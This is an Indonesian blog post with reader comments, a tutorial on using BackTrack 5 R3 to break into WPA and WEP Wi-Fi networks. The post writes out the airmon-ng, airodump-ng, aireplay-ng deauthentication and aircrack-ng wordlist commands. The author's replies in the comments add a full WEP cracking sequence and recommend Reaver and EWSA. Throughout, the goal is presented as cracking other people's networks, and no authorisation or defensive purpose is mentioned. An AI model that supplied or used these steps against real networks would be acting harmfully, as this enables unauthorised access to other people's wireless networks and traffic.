""

Kamis, 20 September 2012

cara menggunakan back track 5 r3


ads  Banyak cara untuk menggunakan back|track, salah satu`y dengan menggunakan back track 5 r2 atau 5 r3 KDE atau pun GNOME. mungkin yg sedikit agak enak menggunakan r2 r3 GNOME itu menurut saya, dan mungkin sobat semuanya sudah pada paham cara menggunakan backtrack, yah ini mah hanya sekedar sedikit menghapal saja agar tidak lupa.cara menggunakan back|track.
membuka sinyal WPA tidak lah cukup hanya dengan cd/dvd back track tapi harus menyediakan juga media pencari seperti wordlist dan bisa juga menggunakan reaver, kali ini saya hanya bisa membuat tulisan cara menggunakan back track dengan media pencari wordlist,

-backtrack 5 r2 r3                   ( download disini gratis )
-wordlist, silahkan                   ( download wordlist no saudi disini )


Langsung saja




setelah kita masuk ke dalam back track seprti gambar di atas klik console



di dalam console tulis airmon-ng wlan0 (0=nol) -ok


setelah muncul lagi root@toor baru tulis airmon-ng start wlan0 -ok


setelah muncul lagi root@toor yg ke3 tulis tali airodump-ng mon1 -ok


langsung akan muncul entri pencarian nama target sinyal yg akan kita coba buka
dan setelah kita menemukan targetnya, langsung aja klik ctrl+c (dir)  pada keyboard
untuk menghentikan pencarian dan muncul root@toor baru, untuk memulai mendapatkan HANDSHAKE oleh nama sinyal yg akan kita coba buka,


untuk mendapatkan HANDSHAKE tulis di root@toor
airodump-ng -c (canel) -w  (nama sinyal) -- bssid ( no bssid) mon1 -ok
contoh seperti gambar di atas
( airodump-ng -c 11 -w alessa --bssid B4:74:9F:23:13:9C mon1 )


biar pencarian HANDSHAKE ingin cepet di  dapatkan, buka console baru dan tulis
aireplay-ng -0 (no chanel) -a (no bssid) -ok
contoh seperti gambar di atas
( aireplay-ng -0 11 -a B4:74:9F:23:13:9C )
setelah di ok biarkan dan akan nampak seperti gambar di atas sampai di console pertama mendapatkan HANDSHAKE,


Contoh gambar di atas yg dikasih garis merah, itu adalah HANDSHAKE

HANDSHAKE ini merupakan pecahan rumus sandi yg di capture menjadi cap01 jika sobat ingin mencoba mendapatkan pasword dari sebuah nama sinyal yg akan dibuka dengan secara ofline atau membuka sinyal bisa sambil internetan biar sedikit agak tidak terlalu jenuh, caranya tinggal sobat copy saja file cap01 hasil dr HANDSHAKE tadi ke dalam FLASHDISK lalu keluar dr back|track dan nyalakan lg komputer
cara membuka sinyal secara ofline dari back|track
( lihat disini )

Untuk mencari dimana file cap01nya, di bar bawan sebelah console ada dolphin lalu pilih menu home (contoh lihat gambar di bawah), untuk membuka secara ofline cap01 di copy dan pastekan ke flashdisk kalau flashdisk terhubung ke komputer kita di bawah menu home-networh-root-trash-BT5 nah dibawah trash di atas BT5 akan muncul menu buat flashdisk pastekan disitu cap01 tadi,


untuk melanjutkan membuka pasword (online) langsung dengan BT 
setelah tadi mendapatkan HANDSHAKE, buka lagi console baru dan tulis
aircrack-ng (copas cap01) -ok
lihat gambar di atas


setelah napak seperti gambar di atas garis kuning bertuliskan wpa (1 handshake)
itu pertanda handshake siap memecahkan pasword sinyal dengan bantuan media wordlist
caranya ketik: aircrack-ng (copas cap01) -w(copas wordlist) -ok
model wordlist 050..... 056.....055....059.... dll pilih salah satu model wordlist


Langsung akan terbuka entri berjalan memecahkan rumus pencocokan antara pasword sinyal yg ada di dalam cap01 dengan wordlist, jika handshake sudah cocok dengan wordlist maka akan tampak seperti gambar di atas yg di lingkari warna hijau itu adalah pasword dari nama sinyal yg di bobol dan jika handshake tidak cocok dengan wordlist maka sobat harus mengulang mulai dari
aircrack-ng (copas cap01) -w(copas wordlist)
ganti wordlist dengan model yg lain, sampai KEY POUND! dan no pasword berhasil di pecahkan, seperti gambar di atas yg di lingkari warna hijau

selamat mencoba semoga sukses!!!

(sedikit tambahan informasi, untuk mebuka sinyal lebih enak membobol sebuah sinyal dengan secara ofline menggunakan ewsa, selain membuka sinyal kita bisa internetan dan agar media pencari selain wordlist, ewsa juga menyediakan media pencari jikalau pasword bukan dari no telepon, karena wordlist biasanya menyediakan hanya untuk no telepon/hp dan ewsa sangatlah dibutuhkan untuk masalah ini)

_________________________________________________________________________________
TROTRIAL BACK|TRACK TANPA WORDLIST / INFLATOR
_________________________________________________________________________________

      CARA MEMBUKA WPA/WPA2 DENGAN
INFLATOR / REAVER
MEMBOBOL SINYAL DENGAN BT 5 R3
MEMBOBOL SINYAL WPA DENGAN EWSA

Semoga tulisan ini  bisa membantu membantu dan menambah pengetahuan, Sukses s`lalu---------

28 komentar:

muhibbin mengatakan... Balas

Gan apa ini bisa untu win7
maklum gaptek.oh y, password winrarnya gan,

ditunggu y password & artikel selanjutnya

Tanks atas artikelnya yang mantap

andy sador mengatakan... Balas

@muhibbin
makasih atas kunjungan`y
bisa ko semua bisa di gunakan di os apa saja dan semua sudah saya coba (sukses) kecuali windows 8, windows 8 sy belum mencoba`y,
rar buat ewsa yah???
sekarang sudah di perbaiki rar`y tanpa pasword, tp klo yg sudah terlajur download dan g ingin ngedownload lg pasword rar`y NURZAMAN
semoga sukses sll,
buat artikel bobol sinyal enakan pake reaver gan, 100% kena

Sunja wana mengatakan... Balas

gan saya coba di win 8 kenapa malah hitam monitornya tidak seperti gambar2 gimana mengatasinya gan

andy sador mengatakan... Balas

@Sunja wana:
@sunja wana :
layar hitam atau blank,
masalah blank di sebabkan karena codec vga`y,
sedikit membantu solusi`y ikuti langkah seperti ini.
coba restart dan jalankan lg back|track`y, saat pertama kali dalam mobe boot dalam back|track jangan agan langsung enter atau biasa`y nenunggu beberapa detik langsung agan klik TAB pada keyboard agan, dan ligat vga`y
( < casper/vmlinuz file=/cdrom/preseed/costom.seed boot=casper initrd=casper/initrd.gz text plash vga=791--)
kalau dalam posisi vga seperti ini agan menghadapi blank coba agan tambahi sedikit dengan vga dr back|track seperti ini
( < casper/vmlinuz file=/cdrom/preseed/costom.seed boot=casper initrd=casper/initrd.gz text plash vga=791--i915.modeset=1) enter tunggu dan enter lagi tuggu hingga mode startx contoh ( root@bt:`# silahkan startx ) enter dan agan bisa memulai untuk bermain dengan back|track, semoga tulisan saya bisa membantu,

Sunja wana mengatakan... Balas

@andy sador:Makasih gan atas jawaban nya sngat membantu trimakasih

rere grip mengatakan... Balas

bang tolong kasih tahu cara bobol wep pakek backtrack5 r3 ???

andy sador mengatakan... Balas

@rere grip:

@rere: makasih atas kunjungan`y,
saya belum pernah mencoba bk wep menggunakan 5r3, tp klo sama 5r2 sam 4r2 cara ini sukses,
1 masuk ke batk|track,
buka terminal (console) tulis
airmon-ng wlan0 - airmon-ng start wlan0 - airodump-ng wlan0, tunggu sampai wps mengeluarkan nama2 sinyal, setelah nama2 sinyal target (wep) terbaca wps dengan satation`y, di dir (ctrl+c) lalu tulis airodump-ng -w wep -c .. -b bssid ..:..:..:..:..:.. mon0 sambil nunggu handshake keluar untuk mendapaykan cap01
kita buka console baru, tulis aireplay-ng -1 1 -a (no bssid) mon0 enter
setelah enter buka lg console baru tulis aireplay-ng -3 -b (no bssid) mon0 enter, tunggu hingga handshake keluar di pojok atas sebelah kiri pada console pertama,
setelah handeshake keluar ini menghasilkan cap01, cari file cap01 di menu home, lalu copy cap01 dan buka lagi console (terminal) baru tulis aircrack-ng paste cap01 enter
tunggu hingga pasword berhasil di ketemukan,
nb: langkah`y sama dengan membuka wpa seperti di atas cuman dari cara penulisan yg sedikit berbeda dan wep tidak menggunakan wordlist,
selamat mencoba dan semoga sukses

andy sador mengatakan... Balas

@rere grip:
sedikit tambahan buat @rere:
ini contoh penulisan morse`y:
console 1:
airmon-ng wlan0
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -w wep -c 11 --bssid B4:74:9F:23:13:9C mon0
console 2:
aireplay-ng -1 1 -a B4:74:9F:23:13:9C mon0
console 3:
aireplay-ng -3 -b B4:74:9F:23:13:9C mon0
console 4:
aircrack-ng copas 01cap

vhifoe mengatakan... Balas

saya pakenya win8 sukses untuk bt5r3....tapi selanjutnya ga bisa pake.

gan admin tuorial ebooknya dong biar bisa di pelajari offlline
makasih

andy sador mengatakan... Balas

@vhifoe:makasih atas komentar agan, tp kenapa selajut`y gak bisa pake???
untuk tutorial menggunakan e`book, sy tidak bisa membuat`y karena belum pernah nyoba, karena saya tidak punya e`book,semua yg sy tulis di blog ini sudah sukses tes di pc, sekali lagi maaf,
kemungkin untuk bisa login` di e`book menggunakan live usb, seperti login mengunakan netbook, ini hanya kemungkinan,,, :p

odie aja mengatakan... Balas

gan kalu ini er0r ada solusinya g,,,,,knpa warning,,,http://prntscr.com/ttj3s,:

andy sador mengatakan... Balas

@odie aja:
@odie aja, waksud`y eror tuh apa??? coba sedikit jelaskan dan apa`y yg warning???
( http://prntscr.com/ttj3s,: apa link ini yg warning??? ini lightshot tool untuk screen monitor atau memotret layar deskop komputer, kalau menggunakan laptop gak usah pake tool lg, langsung saja klik tombol (prt sc sys rq) pd keybord laptop, tinggal shot menggunakan mouse dan langsung jadi,

Bintan Hati mengatakan... Balas

brow tlong buatin vidiox donk biar makin jelas carax...

andy sador mengatakan... Balas

@Bintan Hati:
@bintan hati, permintaan agan,,, membuat sy lbh semangat buat belajar bersama2, insya allah gan,, nanti mlm akan sy coba membuat tutorial`y semoga aja besok udah bisa di upload,,

Bintan Hati mengatakan... Balas

ok gan aku tggu ya....

andy sador mengatakan... Balas

@Bintan Hati:
@bintan hati, alhamdulillah video`y udah sy selipkan di blog ini,
NB: video ini cara trik yg lebih baik dr pada menggunakan wordlist dan tanpa software lg, atau agan bisa lihat disini http://andysador.blogspot.com/2012/09/back-track-5-r3-dengan-reaver.html

Bintan Hati mengatakan... Balas

ok gan aq liat dl makasi gan

Bintan Hati mengatakan... Balas

kira2 brapa jam agar pasporx bisa di buka gan.....????

Bintan Hati mengatakan... Balas

brow knapa saat aq membuka terminal tulisanx root@bt:
Tapi aq liat di atas gambar knapa tulisanx
root@toor: ya.... Apa bedax itu gan....?

andy sador mengatakan... Balas

@Bintan Hati:
@Bintan hati, lama sebentar`y pasword di pecahkan, tergantung dr kesulitan acak si pasword, min 15 menit max 10jam, yg penting si target excellent, agar tak putus saat peng`crack-an`y,
sebetul`y bukan root@toor sprt yg sy tulis, tp root@root yg ada di console BT, dan klo root@bt: berarti agan menggunakan BT-GNOME
bukan BT-KDE,

Bintan Hati mengatakan... Balas

jadi harus backtrack brapa gan....yg bgs....and link donwloadx di mana gan.....?

andy sador mengatakan... Balas

@Bintan Hati:semua back|track bagus,,,cuman yg GNOME itu lebih cepat membaca
link download ada di atas posingan gratis langsung dr situs resmi`y,

Bintan Hati mengatakan... Balas

ok gan makasi sangat membantu

andy sador mengatakan... Balas

@Bintan Hati:ok,,,, makasih juga udah mau nyempetin berkunjung,,,,,
semoga ada trik yg lebih simpel lg

Anonim mengatakan... Balas

ahh,banyak bacot ja loe.banyak amat postingan di komentar ini.rapi tidak bisa apa2.pake cara simple ja......salam hangat by: binus hacker8.

Dicky Kurniawan mengatakan... Balas

gan bantu ane dong. Ane msh newbie sma backtrack, bisa bimbing ane gk gan buat nyoba tu software. Please gan :)

andy sador mengatakan... Balas

@Dicky Kurniawan:
ayo kita belajar bersama2,,,

Zeptiano_BJC mengatakan... Balas

Gan instal backtracknya pake VMware player???